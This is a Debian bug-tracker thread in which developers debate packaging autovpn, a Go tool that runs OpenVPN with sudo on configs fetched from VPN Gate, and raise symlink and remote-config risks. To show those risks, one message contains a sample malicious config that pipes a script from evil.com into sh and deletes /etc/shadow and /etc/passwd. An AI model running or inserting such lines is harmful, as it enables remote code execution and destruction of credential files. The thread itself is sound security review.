Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Gunnar Wolf]

Michael Meskes dijo [Mon, Feb 19, 2018 at 12:44:40PM +0100]:
> >   I'd strongly urge you to reconsider packaging this project, for
> >  three main reasons:
> > 
> >   * It relies upon the external VPNGate.net site/service.  If this
> > goes away in the lifetime of a stable Debian release users will
> > be screwed.
> 
> That is actually a good point. I wonder if using a local copy might be
> a good alternative.

I suppose the information it downloads is needed to keep the database
up to date. Thinking about a lifetime of ~5 years (stable+oldstable),
I don't think we could work around that

> >   * It allows security attacks on against the local system which the
> > remote service could exploit:
> > 
> > 1.  The tool downloads a remote URL to /tmp/openvpnconf
> > 
> > 2.  The file is then given as an argument to the command:
> > sudo openvpn /tmp/openvpnconf
> > 
> > 3.  That generated/downloaded openvpn configuration file could
> >be written to do anything, up to and including `rm -rf /`.
> 
> Can you actually get openvpn to do this?

Depends on what information you put in /tmp/openvpn.conf, I guess. The
least likely candidates end up opening holes - i.e. remember the quite
recent KDE notifier bug allowing FAT volume labels containing $() to
be executed :-P

I mean - It might be completely OK. But given this creates
configuration for setting up a high-privileged daemon from a public
place, it'd be on you to carefully comb on the relevant parts of the
source to assert the handling of this information is sensible.

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Michael Meskes]

> For the records I do not think that this is important since the
> whole 
> purpose of the program is accessing this data, but the other
> objections 
> are significant enough that I do not see much value in having this 
> packaged.

I agree that Steve's last point got me, too. As long as one has to
check the created config file manually there is no point in automating
the rest of it.

> > That is actually a good point. I wonder if using a local copy might
> > be
> > a good alternative.
> 
> Obviously not, since it would quickly become stale considering the 
> nature of the data.

This I don't understand. The way I understand it these are legit
offerings by universities, telcos, etc. Why should they become stale?

Michael
-- 
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Meskes at (Debian|Postgresql) dot Org
Jabber: michael at xmpp dot meskes dot org
VfL Borussia! Força Barça! SF 49ers! Use Debian GNU/Linux, PostgreSQL

signature.asc
Description: This is a digitally signed message part

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Marco d'Itri]

On Feb 19, Michael Meskes  wrote:

> >   * It relies upon the external VPNGate.net site/service.  If this
> > goes away in the lifetime of a stable Debian release users will
> > be screwed.
For the records I do not think that this is important since the whole 
purpose of the program is accessing this data, but the other objections 
are significant enough that I do not see much value in having this 
packaged.

> That is actually a good point. I wonder if using a local copy might be
> a good alternative.
Obviously not, since it would quickly become stale considering the 
nature of the data.

-- 
ciao,
Marco


signature.asc
Description: PGP signature

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Michael Meskes]

>   I'd strongly urge you to reconsider packaging this project, for
>  three main reasons:
> 
>   * It relies upon the external VPNGate.net site/service.  If this
> goes away in the lifetime of a stable Debian release users will
> be screwed.

That is actually a good point. I wonder if using a local copy might be
a good alternative.

>   * It allows security attacks against the local system, which other
> users on the host could exploit via symlink attacks on
> /tmp/openvpnconf

True, but this could be handled by using a better system to access a
temp file.

>   * It allows security attacks on against the local system which the
> remote service could exploit:
> 
> 1.  The tool downloads a remote URL to /tmp/openvpnconf
> 
> 2.  The file is then given as an argument to the command:
> sudo openvpn /tmp/openvpnconf
> 
> 3.  That generated/downloaded openvpn configuration file could
>be written to do anything, up to and including `rm -rf /`.

Can you actually get openvpn to do this?

>   Finally the project itself notes:
> 
> "This is completely insecure. Please do not use this for anything
> important. Get a real and secure VPN. This is mostly a fun tool
> to
> get a VPN for a few minutes."

I read this not as "insecure for the system it runs on" but "insecure
on the connection side". This is certainly not something you should use
  to open your local network to, or to do something illegal.

Michael
-- 
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Meskes at (Debian|Postgresql) dot Org
Jabber: michael at xmpp dot meskes dot org
VfL Borussia! Força Barça! SF 49ers! Use Debian GNU/Linux, PostgreSQL

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Steve Kemp]

On Mon Feb 19, 2018 at 12:44:40 +0100, Michael Meskes wrote:

> >   * It relies upon the external VPNGate.net site/service.  If this
> > goes away in the lifetime of a stable Debian release users will
> > be screwed.
> 
> That is actually a good point. I wonder if using a local copy might be
> a good alternative.

  If you're willing to maintain such a list, resyncing it every
 few days/months to reap dead-entries and add new ones then that
 would be good.

> >   * It allows security attacks against the local system, which other
> > users on the host could exploit via symlink attacks on
> > /tmp/openvpnconf
> 
> True, but this could be handled by using a better system to access a
> temp file.

  Sure.  If you changed the code to use ioutil.TempFile, or some
 other secure alternative that specific objection will go away.

> > 1.  The tool downloads a remote URL to /tmp/openvpnconf
> > 
> > 2.  The file is then given as an argument to the command:
> > sudo openvpn /tmp/openvpnconf
> > 
> > 3.  That generated/downloaded openvpn configuration file could
> >be written to do anything, up to and including `rm -rf /`.
> 
> Can you actually get openvpn to do this?

  Yes.  For example these snippets will do what you fear they will:

script-security 2
up curl http://evil.com/root-me.sh | sh
up rm /etc/shadow
down rm -f /etc/passwd

> I read this not as "insecure for the system it runs on" but "insecure
> on the connection side". This is certainly not something you should use
>   to open your local network to, or to do something illegal.

  As per the insecure fixed name, and the execution of commands from
 a remote HTTP-site (not even SSL!) I think it is insecure in all
 regards.

  Also I guess you'll need to change the script to remove "sudo", or
 better yet add a restricted user with sudo's nopasswd setup for it
 (shudder).

Steve
-- 
https://www.steve.org.uk/

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Steve Kemp]

>   Version : 0.0~git20170129.72dd7f6-1
>   Upstream Author : Adhityaa C 
> * URL : https://github.com/adtac/autovpn
..
> autovpn is a tool to automatically connect you to a random VPN
> in a country of your choice. It uses openvpn to connect you to a server
> obtained from VPN Gate (http://www.vpngate.net/en/).

  I'd strongly urge you to reconsider packaging this project, for
 three main reasons:

  * It relies upon the external VPNGate.net site/service.  If this
goes away in the lifetime of a stable Debian release users will
be screwed.

  * It allows security attacks against the local system, which other
users on the host could exploit via symlink attacks on /tmp/openvpnconf

  * It allows security attacks on against the local system which the
remote service could exploit:

1.  The tool downloads a remote URL to /tmp/openvpnconf

2.  The file is then given as an argument to the command:
sudo openvpn /tmp/openvpnconf

3.  That generated/downloaded openvpn configuration file could
   be written to do anything, up to and including `rm -rf /`.

> A small tool that comes handy in particular for people who travel a lot. Will
> be maintained in the go-team.

  Finally the project itself notes:

"This is completely insecure. Please do not use this for anything
important. Get a real and secure VPN. This is mostly a fun tool to
get a VPN for a few minutes."

Steve
-- 

Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice

[Michael Meskes]

Package: wnpp
Severity: wishlist
Owner: Michael Meskes 

* Package name: autovpn
  Version : 0.0~git20170129.72dd7f6-1
  Upstream Author : Adhityaa C 
* URL : https://github.com/adtac/autovpn
* License : GPL V3
  Programming Lang: Go
  Description : Connect to a VPN in a country of your choice

autovpn is a tool to automatically connect you to a random VPN
in a country of your choice. It uses openvpn to connect you to a server
obtained from VPN Gate (http://www.vpngate.net/en/).

A small tool that comes handy in particular for people who travel a lot. Will
be maintained in the go-team.

Michael